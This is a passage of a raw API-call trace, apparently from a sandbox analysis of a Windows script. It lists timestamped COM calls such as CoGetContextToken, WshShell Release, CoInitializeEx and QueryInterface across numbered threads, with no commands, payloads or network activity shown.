returned 0x0 [0167.831] CoGetContextToken (in: pToken=0x5a0ef38 | out: pToken=0x5a0ef38) returned 0x0 [0167.831] WshShell:IUnknown:Release (This=0x285298) returned 0x1 [0167.831] WshShell:IUnknown:Release (This=0x285288) returned 0x0 [0167.832] CoGetContextToken (in: pToken=0x5a0ef38 | out: pToken=0x5a0ef38) returned 0x0 [0167.832] WshShell:IUnknown:Release (This=0x283d34) returned 0x1 [0167.832] WshShell:IUnknown:Release (This=0x283d20) returned 0x0 [0167.834] IUnknown:Release (This=0x6239d0) returned 0x0 [0167.835] CoUninitialize () Thread: id = 85 os_tid = 0xff4 Thread: id = 86 os_tid = 0xff8 Thread: id = 87 os_tid = 0xaec [0111.952] CoGetContextToken (in: pToken=0x4e9fc34 | out: pToken=0x4e9fc34) returned 0x0 [0111.952] CObjectContext::QueryInterface () returned 0x0 [0111.952] CObjectContext::GetCurrentThreadType () returned 0x0 [0111.952] Release () returned 0x0 [0111.952] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Thread: id = 88 os_tid = 0xaf0 Thread: id = 89 os_tid = 0xaf4 Thread: id = 90 os_tid = 0xafc Thread: id = 91 os_tid = 0xb00 [0117.483] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0117.485] ResetEvent (hEvent=0x41c) returned 1 Thread: id = 92 os_tid = 0xa68 Thread: id = 93 os_tid = 0xacc Thread: id = 94 os_tid = 0xad0 Thread: id = 95 os_tid = 0xad8 Thread: id = 97 os_tid = 0xbc8 Thread: id = 98 os_tid = 0xbac Thread: id = 99 os_tid = 0xba4 [0157.238] CoGetContextToken (in: pToken=0x624ef74 | out: pToken=0x624ef74) returned 0x0 [0157.238] IUnknown:QueryInterface (in: This=0x623860, riid=0x71d3b24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x624ef98 | out: ppvObject=0x624ef98*=0x62386c) returned 0x0 [0157.238] IComThreadingInfo:GetCurrentThreadType (in: This=0x62386c, pThreadType=0x624efc4 | out: pThreadType=0x624efc4*=0) returned 0x0 [0157.238] IUnknown:Release (This=0x62386c) returned 0x0 [0157.366] CoGetContextToken (in: pToken=0x624ef74 | out: pToken=0x624ef74) returned 0x0 [0157.366] IUnknown:QueryInterface (in: This=0x623860, riid=0x71d3b24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x624ef98 | out: ppvObject=0x624ef98*=0x62386c) returned 0x0 [0157.366] IComThreadingInfo:GetCurrentThreadType (in: This=0x62386c, pThreadType=0x624efc4 | out: pThreadType=0x624efc4*=0) returned 0x0 [0157.366] IUnknown:Release (This=0x62386c) returned 0x0 Thread: id = 100 os_tid = 0xba0 Thread: id = 101 os_tid = 0xbb4 Thread: id = 102 os_tid = 0xbb0 Thread: id = 103 os_tid = 0xc24 Thread: id = 104 os_tid = 0xc20